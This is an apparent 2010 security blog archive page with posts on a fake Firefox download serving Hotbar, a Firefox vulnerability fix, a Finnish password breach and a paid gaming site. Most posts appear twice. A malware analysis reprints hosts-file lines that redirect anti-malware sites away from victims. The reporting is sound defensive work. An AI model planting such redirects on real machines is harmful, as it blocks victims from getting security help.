“Players browse PlayDate profiles — of which there are currently 1200 — view photos and even chat with girls for free.”
“At the moment it only supports Xbox 360 and some games on the GameCrush website. GameCrush plans to support PlayStation 3, Wii and World of Warcraft.”
Story here: “GameCrush lets gamers pay to play with girls “
And here.
Given that there might be 400,000 gamers (gold farmers) in third world countries making great money (for them) by playing 12 hours a day, I predict GameCrush is going to be a GREAT opportunity for female gamers from third-world countries (and everywhere else for that matter.)
GameCrush might be on to something: http://prdtest.gamecrush.com/
Yesterday afternoon:
This morning:
I can't say I'm massively impressed with this one.
“It's embarrassing when you walk into a game store and some box art has a ludicrously underdressed woman who's supposed to be in the middle of a war zone. It's embarrassing when the cover of video game magazines resemble something you'd normally find on the top shelf. And it's embarrassing to see people happy to pay for something like this. There are actually plenty of females on gaming services who will happily talk to you for free, and they'll shoot you AND they won't charge money for it.
“They might upload your horrible deaths to YouTube, though.”
Ok.
It’s an old formula for a successful business: pay girls to have fun with you.
This time the schtick is getting on-line gamers to pay $8.25 (US) to play an online game with a female for 10 minutes. The women get to keep 40 percent.
The site is GameCrush. It just opened last night and it seems to be a success (screen shots below.)
“GameCrush is being touted as the first social site for adult gamers with the women online able to set their gaming mood to either ‘flirt’ or ‘dirt’, IGN reports.
“The men online are known as Players and the women as PlayDates and Players pay to play while PlayDates get paid to play.
“Players browse PlayDate profiles — of which there are currently 1200 — view photos and even chat with girls for free.”
“At the moment it only supports Xbox 360 and some games on the GameCrush website. GameCrush plans to support PlayStation 3, Wii and World of Warcraft.”
Story here: “GameCrush lets gamers pay to play with girls “
And here.
Given that there might be 400,000 gamers (gold farmers) in third world countries making great money (for them) by playing 12 hours a day, I predict GameCrush is going to be a GREAT opportunity for female gamers from third-world countries (and everywhere else for that matter.)
GameCrush might be on to something: http://prdtest.gamecrush.com/
Yesterday afternoon:
This morning:
I can't say I'm massively impressed with this one.
“It's embarrassing when you walk into a game store and some box art has a ludicrously underdressed woman who's supposed to be in the middle of a war zone. It's embarrassing when the cover of video game magazines resemble something you'd normally find on the top shelf. And it's embarrassing to see people happy to pay for something like this. There are actually plenty of females on gaming services who will happily talk to you for free, and they'll shoot you AND they won't charge money for it.
“They might upload your horrible deaths to YouTube, though.”
Wednesday, March 24, 2010
Download Windows 7 Mountains Theme – Syue & Nenggao
We’ve previously listed many official themes for Windows 7, presented by Microsoft at Windows 7 Personalization Gallery. Here are 2 more new themes which truly depicts the prominent beauty of Taiwanese mountains ‘Syue & Nenggao’ in Taiwan.
Syue or Hsuehshan or Snow Mountain is the second highest mountain in Taiwan with its main peak at 3,886 m (12,749 ft) above sea level.
Nenggao is a mountain in Taiwan whose southern peak has an elevation of 3,349 m. Its main peak lies at 3,261 m.
Download:
Syue or Hsuehshan or Snow Mountain is the second highest mountain in Taiwan with its main peak at 3,886 m (12,749 ft) above sea level.
Nenggao is a mountain in Taiwan whose southern peak has an elevation of 3,349 m. Its main peak lies at 3,261 m.
Download:
The Facebook Dislike Button Likes Hotbar
Not so long ago, examples of fake Firefox websites / downloads were in the news with the sites involved serving Hotbar installs.
It seems the tactic of offering up Firefox (but giving you something else entirely) is going to be around for a little while. Below is a site promoting a Firefox .xpi called “The Dislike Button”, designed to let you add an “I dislike this” note to Facebook posts:
The domain is dislikes(dot)info. Note the “Get Firefox” button at the top. What do you think happens if you click it?
That’s right, you’re given the option of downloading a setup file from Hotbar…not exactly the Firefox download you were expecting. Should the end-user install it thinking this will give them Firefox, they’re very much mistaken.
What they actually get is the option to download Hotbar (and no Firefox), complete with a preticked ShopperReports checkbox. While I can understand having to download Firefox to use a Firefox .xpi, the need for installing the above escapes me.
Additionally, there’s a text link further down the page asking you to “Get Firefox now” which also directs you to the Hotbar install.
What’s particularly curious here is that if you visit the “Facebook Fan Page” linked to by the main site, you’ll see the following post:
They’re not happy about people forcing surveys on end-users to obtain the Dislike button (fair enough), yet the main site asks you to “get Firefox” but gives you Hotbar.
I think….I dislike this.
It seems the tactic of offering up Firefox (but giving you something else entirely) is going to be around for a little while. Below is a site promoting a Firefox .xpi called “The Dislike Button”, designed to let you add an “I dislike this” note to Facebook posts:
The domain is dislikes(dot)info. Note the “Get Firefox” button at the top. What do you think happens if you click it?
That’s right, you’re given the option of downloading a setup file from Hotbar…not exactly the Firefox download you were expecting. Should the end-user install it thinking this will give them Firefox, they’re very much mistaken.
What they actually get is the option to download Hotbar (and no Firefox), complete with a preticked ShopperReports checkbox. While I can understand having to download Firefox to use a Firefox .xpi, the need for installing the above escapes me.
Additionally, there’s a text link further down the page asking you to “Get Firefox now” which also directs you to the Hotbar install.
What’s particularly curious here is that if you visit the “Facebook Fan Page” linked to by the main site, you’ll see the following post:
They’re not happy about people forcing surveys on end-users to obtain the Dislike button (fair enough), yet the main site asks you to “get Firefox” but gives you Hotbar.
I think….I dislike this.
Firefox 3.6.2 early edition
Mozilla Foundation has released version 3.6.2 of its Firefox browser a week early. The group had said the update would be available March 30.
The update fixes a widely reported vulnerability (CVE-2010-1028) that prompted Germany’s CERT to advise Web users to switch to another browser until a fix was made. (My blog post “Germany’s CERT warns against Firefox use” )
Intevydis researcher Evgeny Legerov had found that Wide Open Font Format decoder in Firefox had an integer overflow in its font decompression mechanism. The flaw involved a memory buffer that was too small to handle a downloadable font. Legerov had found that exploiting the vulnerability could crash a victim's browser making it possible to run arbitrary code on the system.
If you use Firefox, update here.
Security advisories for Firefox 3.6 here.
Tuesday, March 23, 2010
Smart Aleck Passwords
Älypää, a popular Finnish game and quiz site, announced a database breach late last night.
Over 127,000 account names and passwords were leaked.
The site has currently suspended access and doesn't maintain any personal details but Älypää users should determine whether or not they recycle their passwords elsewhere. If so, those accounts are at risk of being hacked.
CERT-FI guidelines can be found here.
Here's a list of the top 20 domains on the list:
And here's a list of the top 20 passwords used:
The number one choice? It's salasana — that's Finnish for password.
Google Translate can assist you with the rest.
Over 127,000 account names and passwords were leaked.
The site has currently suspended access and doesn't maintain any personal details but Älypää users should determine whether or not they recycle their passwords elsewhere. If so, those accounts are at risk of being hacked.
CERT-FI guidelines can be found here.
Here's a list of the top 20 domains on the list:
And here's a list of the top 20 passwords used:
The number one choice? It's salasana — that's Finnish for password.
Google Translate can assist you with the rest.
Using Windows “hosts” file to cut off the help line
We found this interesting and malicious little mechanism.
The hosts file on a machine under investigation was modified to redirect the victim’s browser to a well known legitimate site (in this case google.com) whenever he attempted to contact a list of nearly 400 sites. The list was a “Who’s Who” of the anti-malware world – most places where someone with an infected machine would go to get help.
The altered hosts file he found contained many lines beginning with ‘#’ followed by gibberish. These would be seen as comments by any browser and ignored. Concealed among the commented lines are lines containing the domain name redirections. When the commented lines are stripped, we find all the listed security related websites being redirected to “209.85.129.99” which is the IP address for google.com.
Some of the sites were:
209.85.129.99 lexikon.ikarus.at
209.85.129.99 www.virusdoctor.jp
209.85.129.99 www.spybotupdates.com
209.85.129.99 securityresponse.symantec.com
209.85.129.99 www.mcafee.com
209.85.129.99 es.trendmicro-europe.com
209.85.129.99 www.quickheal.co.in
209.85.129.99 www.offensivecomputing.net
209.85.129.99 research.sunbelt-software.com
209.85.129.99 www.sunbeltsoftware.com
209.85.129.99 www.sunbeltsecurity.com
209.85.129.99 www.cwsandbox.org
The “hosts” file is in the Windows\system32\drivers\etc directory in Win XP, Win7 and Win08 Server – and probably all incarnations of Windows, since browsers are going to look there.
Learn more about Hosts Here.
The hosts file on a machine under investigation was modified to redirect the victim’s browser to a well known legitimate site (in this case google.com) whenever he attempted to contact a list of nearly 400 sites. The list was a “Who’s Who” of the anti-malware world – most places where someone with an infected machine would go to get help.
The altered hosts file he found contained many lines beginning with ‘#’ followed by gibberish. These would be seen as comments by any browser and ignored. Concealed among the commented lines are lines containing the domain name redirections. When the commented lines are stripped, we find all the listed security related websites being redirected to “209.85.129.99” which is the IP address for google.com.
Some of the sites were:
209.85.129.99 lexikon.ikarus.at
209.85.129.99 www.virusdoctor.jp
209.85.129.99 www.spybotupdates.com
209.85.129.99 securityresponse.symantec.com
209.85.129.99 www.mcafee.com
209.85.129.99 es.trendmicro-europe.com
209.85.129.99 www.quickheal.co.in
209.85.129.99 www.offensivecomputing.net
209.85.129.99 research.sunbelt-software.com
209.85.129.99 www.sunbeltsoftware.com
209.85.129.99 www.sunbeltsecurity.com
209.85.129.99 www.cwsandbox.org
The “hosts” file is in the Windows\system32\drivers\etc directory in Win XP, Win7 and Win08 Server – and probably all incarnations of Windows, since browsers are going to look there.
Learn more about Hosts Here.
Screenshots – Opera Mini 5 App for iPhone
Subscribe to:
Posts (Atom)